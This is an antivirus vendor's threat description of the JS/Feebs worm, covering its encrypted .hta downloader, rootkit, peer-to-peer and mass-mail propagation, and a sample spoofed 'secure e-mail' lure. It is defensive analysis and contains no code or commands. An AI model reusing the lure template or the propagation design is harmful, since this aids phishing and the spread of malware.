This application requires Javascript for optimal performance.

JS/Feebs.fam!worm - Released Aug 03, 2006

Detection Availability

Active DatabaseExtended Database
FortiGate
low
high
FortiClient
FortiMail N/A

Visible Symptoms

Detailed Analysis

JS/Feebs.fam!worm - 06-08-03


Network/Internet:

  • Connects to Server: HTTP
  • Other Payloads: Downloads updates

More Info:

In-depth
--------

Feebs appeared in december 2005. It is an old-fashioned worm, designed
to be annoying and destructive, not stealth, like most of modern
threats.

It is made up of 2 parts:
- the downloader, written in JavaScript and emdedded inside an .hta
  file;
- the worm itself, downloaded by the JavaScript part and executed onto
  the system.

The downloader contains several layers of encryption (usually 2 or 3),
each of them containing an algorithm used to decode the layer bellow.
The bottom layer contains the actual code for the downloader.

The worm itself contains a rootkit, P2P propagation, reporting via icq
and on-the-fly injection into emails sent by the user (with MS Outlook).
It also embeds a polymorphic engine, modifying the JavaScript code of
the downloader; it then mass-mails the new .hta files, thus spreading
new variants of Feebs.


Replication
-----------

Feebs arrives by email, as a password-protected zip file attachment.

The email looks like an automated message originating from an online
email service, such as AOL or Hotmail: the sender address is spoofed
and it's written with an informal short-style. The body of the message
contains the password to decompress the zip file.

A typical email looks like:

----------------------------------------
From : n23761@gmail.com
To : mary2000@hotmail.com
Subject : Secure E-mail from Gmail.com user.

ID : 44156
Password : tayqvgdff

Message is attached.

Thank you,
Protected Mail System,
Gmail co
----------------------------------------

A system infected with Feebs will mass-mail the newly modified .hta file
to addresses harvested from the user's contact list, and to addresses
generated from a list of keywords.

To relay its messages, Feebs contacts public mail servers (such as Gmail
or mail.com) along with servers from the domain names it just found in
the contact list.

It also silently attaches itself as a zip file (without password) in all
emails with attachment sent by the user.

Reference: ID - 270781